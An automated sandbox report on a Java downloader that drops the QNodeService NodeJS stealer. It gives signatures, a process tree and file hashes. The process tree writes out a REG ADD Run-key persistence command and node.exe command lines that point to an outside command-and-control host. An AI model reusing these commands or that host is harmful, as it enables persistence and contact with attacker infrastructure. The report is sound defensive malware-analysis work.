PROPERTY DESIGNS.jar

General
Target

PROPERTY DESIGNS.jar

Filesize

463KB

Completed

13-10-2020 05:19

Score
10/10
MD5

40e02d493aca746150f7c1b93b6d3ec7

SHA1

59c16f093953ec650f8d40abddf42fa1a8c5576e

SHA256

e2af2abfd29faf04991e4106528a65260c8173c06b756c124399ee955bec08c1

Malware Config
Signatures 10

Filter: none

Collection
Credential Access
Defense Evasion
Discovery
Persistence
  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    1164node.exe
    3268node.exe
    1188node.exe
  • Loads dropped DLL
    node.exe

    Reported IOCs

    pidprocess
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Adds Run key to start application
    reg.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Runreg.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\7366fb72-5dc0-4232-a593-e5d5eafc2b61 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""reg.exe
  • JavaScript code in executable

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000100000001ad8e-168.datjs
    behavioral2/files/0x000100000001ad8e-173.datjs
    behavioral2/files/0x000100000001ad8e-177.datjs
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    15wtfismyip.com
    16wtfismyip.com
  • Checks processor information in registry
    node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHznode.exe
  • Suspicious behavior: EnumeratesProcesses
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    1164node.exe
    1164node.exe
    1164node.exe
    1164node.exe
    3268node.exe
    3268node.exe
    3268node.exe
    3268node.exe
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
    1188node.exe
  • Suspicious use of WriteProcessMemory
    java.exejavaw.exenode.exenode.exenode.execmd.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3024 wrote to memory of 17763024java.exejavaw.exe
    PID 3024 wrote to memory of 17763024java.exejavaw.exe
    PID 1776 wrote to memory of 11641776javaw.exenode.exe
    PID 1776 wrote to memory of 11641776javaw.exenode.exe
    PID 1164 wrote to memory of 32681164node.exenode.exe
    PID 1164 wrote to memory of 32681164node.exenode.exe
    PID 3268 wrote to memory of 11883268node.exenode.exe
    PID 3268 wrote to memory of 11883268node.exenode.exe
    PID 1188 wrote to memory of 23081188node.execmd.exe
    PID 1188 wrote to memory of 23081188node.execmd.exe
    PID 2308 wrote to memory of 12962308cmd.exereg.exe
    PID 2308 wrote to memory of 12962308cmd.exereg.exe
    PID 1188 wrote to memory of 27561188node.execmd.exe
    PID 1188 wrote to memory of 27561188node.execmd.exe
    PID 2756 wrote to memory of 26282756cmd.exereg.exe
    PID 2756 wrote to memory of 26282756cmd.exereg.exe
Processes 9
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\PROPERTY DESIGNS.jar"
    Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c653b37.tmp
      Suspicious use of WriteProcessMemory
      PID:1776
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain localhost --hub-domain wgloomlozs.hopto.org
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:1164
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_gSbwIZ\boot.js --hub-domain localhost --hub-domain wgloomlozs.hopto.org
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:3268
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_gSbwIZ\boot.js --hub-domain localhost --hub-domain wgloomlozs.hopto.org
            Executes dropped EXE
            Loads dropped DLL
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:1188
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:2308
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:1296
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /F"
              Suspicious use of WriteProcessMemory
              PID:2756
              • C:\Windows\system32\reg.exe
                REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /F
                PID:2628
Network
MITRE ATT&CK Matrix
Command and Control
    Credential Access
    Defense Evasion
    Execution
      Exfiltration
        Impact
          Initial Access
            Lateral Movement
              Privilege Escalation
                Replay Monitor
                00:00 00:00
                Downloads
                • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

                  MD5

                  d41d8cd98f00b204e9800998ecf8427e

                  SHA1

                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                  SHA256

                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                  SHA512

                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                • C:\Users\Admin\AppData\Local\Temp\7c653b37.tmp

                  MD5

                  40e02d493aca746150f7c1b93b6d3ec7

                  SHA1

                  59c16f093953ec650f8d40abddf42fa1a8c5576e

                  SHA256

                  e2af2abfd29faf04991e4106528a65260c8173c06b756c124399ee955bec08c1

                  SHA512

                  f7be6768ae7f772f4455e423f766fdbd80ed9a628be15dfae05e78a5d91790a2922838c15f9cf185bb58d3bf29e8e248c5fb0e8c909e9cd311b1c690908494db

                • C:\Users\Admin\AppData\Local\Temp\_qhub_node_gSbwIZ\boot.js

                  MD5

                  3859487feb5152e9d1afc4f8cd320608

                  SHA1

                  7bf154c9ddf3a71abf15906cdb60773e8ae07b62

                  SHA256

                  8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13

                  SHA512

                  826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

                • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                  MD5

                  f0b11a5823c45fc2664e116dc0323bcb

                  SHA1

                  612339040c1f927ec62186cd5012f4bb9c53c1b9

                  SHA256

                  16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                  SHA512

                  0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                  MD5

                  f0b11a5823c45fc2664e116dc0323bcb

                  SHA1

                  612339040c1f927ec62186cd5012f4bb9c53c1b9

                  SHA256

                  16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                  SHA512

                  0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                  MD5

                  f0b11a5823c45fc2664e116dc0323bcb

                  SHA1

                  612339040c1f927ec62186cd5012f4bb9c53c1b9

                  SHA256

                  16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                  SHA512

                  0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                • \Users\Admin\AppData\Local\Temp\1188-17a42ad825eb1bc3.node

                  MD5

                  f1c9cde23537dc338fb765f2c125f994

                  SHA1

                  6f290977d6e0666c4798b4bc17f640a18598a772

                  SHA256

                  8f73b3d91365fc1a09da9e8029a47f8ad5dd24d0dab03b01cd50de5806c8fb6b

                  SHA512

                  1bbdd3e50d4bcd09ca8e107596497ff3b20d82d728d485ca6eb1ee8660de0c3f4fe24dcc1657f2f59bc4f99fa2ddd525a0446eaed7999ed23b34fe8963750307

                • \Users\Admin\AppData\Local\Temp\1188-369b0ad7a9be82d3.node

                  MD5

                  911a4b53a8ffd6e01c0196c682f06a49

                  SHA1

                  5d0a4de0f72eede786da60fe49620e27b35d388d

                  SHA256

                  f39651fc570f90b0c01655c61c80c3956c6f6c54df5aa8e0aae626f2cb718008

                  SHA512

                  f2081eb8821f8289fdb1e907073a58381212af4872a6759c55f73667eba532bccea1e9f5695a31680708bf62e1b6da08f9e6bb21e1fec9db08ae81db57a9e6ea

                • \Users\Admin\AppData\Local\Temp\1188-4587c35f1285a35f.node

                  MD5

                  87f2661da9a09dc36a1e39b53692e172

                  SHA1

                  fc6a37bfcd72d7d70a3afb6fbd752bf1e0b0990f

                  SHA256

                  7d2532530cd09d589348e1d6c2a46af4d3de73ee72941a4ee5b65cd21c17ddea

                  SHA512

                  7187b2761245b470f4dbdbaa258e8d3cc1f2491bea2f7649212d8abcef1ccfb4c4b7fe4d0a37ca47840dd21eea9d799c94367af43c98027ba6f1247162a9e713

                • \Users\Admin\AppData\Local\Temp\1188-78ad011080742590.node

                  MD5

                  df45601340083518d8bcc10ec848460b

                  SHA1

                  8613d6ab3040d57d241ed4a466c1fffb1b12455b

                  SHA256

                  eebfd03defaa0965393ebde5cd45a982dda75c82d5205a702f88deec660723ed

                  SHA512

                  0e1e14dd82119dc822dccc4da4d64cce62a7796ec1157defa97b4bc29d767d164e6ef65861448b24c4972cc3919bf1583518ba725757c0f96af47a942380cd41

                • \Users\Admin\AppData\Local\Temp\1188-98b08082c62305e6.node

                  MD5

                  ee6e80bab410c751c935e6175acf8b5c

                  SHA1

                  c44cad6425db5c9c86351f9f9f7b019b876db528

                  SHA256

                  dd3bd6107fb87be3c34985df2a8a0645fa7a89172d23ddb66fec64c3236a1af3

                  SHA512

                  c654c44cfe115a9c4f9eaf6ed4207511c17dc4eeb00441c2be6413d0a16c348fce0dcf282f2b9132948150e3541d248edd62b2e055a1cd902f80b9a67d2e1d77

                • \Users\Admin\AppData\Local\Temp\1188-e60b063fc8833b6a.node

                  MD5

                  2e20508eac344dfead52bdc25b73a7fb

                  SHA1

                  c2918d63d3c0f14dce0552530ef0793f3a76bfa7

                  SHA256

                  500e8c83a3d455c26d20fb32e02c26a47a6c7fa906ce2c0491729b731906ac98

                  SHA512

                  25f8c95eb38a39e7ea60145e598f8e00b3b4c61f9ef6ae1689d3be16da7bd7c0d57a55d0d06a8402af694be880408ca6ef01829b79d9768d09967db5e3a2b8de

                • memory/1164-167-0x0000000000000000-mapping.dmp

                • memory/1164-171-0x000002ED10E80000-0x000002ED10E81000-memory.dmp

                • memory/1188-178-0x000003B408D80000-0x000003B408D81000-memory.dmp

                • memory/1188-176-0x0000000000000000-mapping.dmp

                • memory/1296-180-0x0000000000000000-mapping.dmp

                • memory/1776-50-0x0000000000000000-mapping.dmp

                • memory/2308-179-0x0000000000000000-mapping.dmp

                • memory/2628-188-0x0000000000000000-mapping.dmp

                • memory/2756-187-0x0000000000000000-mapping.dmp

                • memory/3268-174-0x000002D1D7D80000-0x000002D1D7D81000-memory.dmp

                • memory/3268-172-0x0000000000000000-mapping.dmp